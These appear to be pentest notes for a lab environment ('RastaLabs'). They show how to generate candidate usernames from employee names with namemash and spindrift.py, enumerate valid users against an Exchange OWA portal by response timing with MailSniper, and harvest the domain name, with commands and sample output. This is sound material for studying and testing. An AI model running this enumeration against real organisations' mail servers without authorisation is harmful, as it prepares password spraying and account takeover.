Microsoft Exchange Attacks

Create username

Namemash

First we need create a user list based on employees names (taken from Linkdin or the company site)

The tool namemash will generate a list of multiple types of common email formats (first.last@, f.last@ last.first@ and etc)


$ cat employees.txt 
Shelley Owen
Jordan Hunt
Patsy Morgan
Ruby Mckenzie
Dan Greer    

$ /opt/namemash/namemash.py employees.txt 
shelleyowen
owenshelley
shelley.owen
owen.shelley
owens
sowen
oshelley
s.owen
o.shelley
shelley
owen
jordanhunt
huntjordan
jordan.hunt
hunt.jordan
huntj
jhunt
hjordan
j.hunt
h.jordan
jordan
hunt
patsymorgan
morganpatsy
patsy.morgan
morgan.patsy
morganp
pmorgan

Spindrify

spindrift.py is a script to create usernames from names from the SprayingToolKit Repo

python3 spindrift.py employess.txt --domain RLAB --format {f}{last}
RLAB\\sowen
RLAB\\jhunt
RLAB\\pmorgan
RLAB\\rmckenzie
RLAB\\dgreer

python3 spindrift.py employess.txt --domain RLAB --format {f}.{last}
RLAB\\s.owen
RLAB\\j.hunt
RLAB\\p.morgan
RLAB\\r.mckenzie
RLAB\\d.greer

Find valid Username format

Using Mail Sniper

GitHub: https://github.com/dafthack/MailSniper

PS C:\\Users\\iron\\Documents\\MailSniper-master> Invoke-UsernameHarvestOWA -ExchHostname 10.10.110.254 -UserList ..\\userlist.txt  -OutFile Owa-valid.txt
[*] Now spraying the OWA portal at <https://10.10.110.254/owa/>
Determining baseline response time...
Response Time (MS)       Domain\\Username
336                      DQPuEV\\fOetIC
272                      iPXWOb\\XyhrOx
201                      vjcDyq\\liUtgQ
226                      IKcFGx\\ImlsFY
180                      dPUBCv\\pqmVrA

         Baseline Response: 243

Threshold: 145.8
Response Time (MS)       Domain\\Username
201                      \\huVHcP
203                      \\PGUkOH
207                      \\CeyRWF
195                      \\tsUlwp
228                      \\RtIMav
191                      \\RhysWeston
202                      \\EleanorPugh
207                      \\NicGodfrey
236                      \\AmberHope
132                      \\BradleyOwen
[*] Potentially Valid! User:\\BradleyOwen
127                      \\TamiQuinn
[*] Potentially Valid! User:\\TamiQuinn
91                       \\RWeston
[*] Potentially Valid! User:\\RWeston
92                       \\EPugh
[*] Potentially Valid! User:\\EPugh
136                      \\NGodfrey
[*] Potentially Valid! User:\\NGodfrey
101                      \\AHope
[*] Potentially Valid! User:\\AHope
95                       \\BOwen
[*] Potentially Valid! User:\\BOwen
127                      \\TQuinn
[*] Potentially Valid! User:\\TQuinn
132                      \\RhysW
[*] Potentially Valid! User:\\RhysW
263                      \\EleanorP
153                      \\NicG
183                      \\AmberH
444                      \\BradleyO
147                      \\TamiQ
[*] A total of 9 potentially valid usernames found.
Results have been written to Owa-valid.txt.

Find domain name

Using MailSniper

[*] Harvesting domain name from the server at 10.10.110.254
[*] Couldn't get domain from Autodiscover URL. Trying EWS URL...
The domain appears to be: (mx01.rastalabs.local)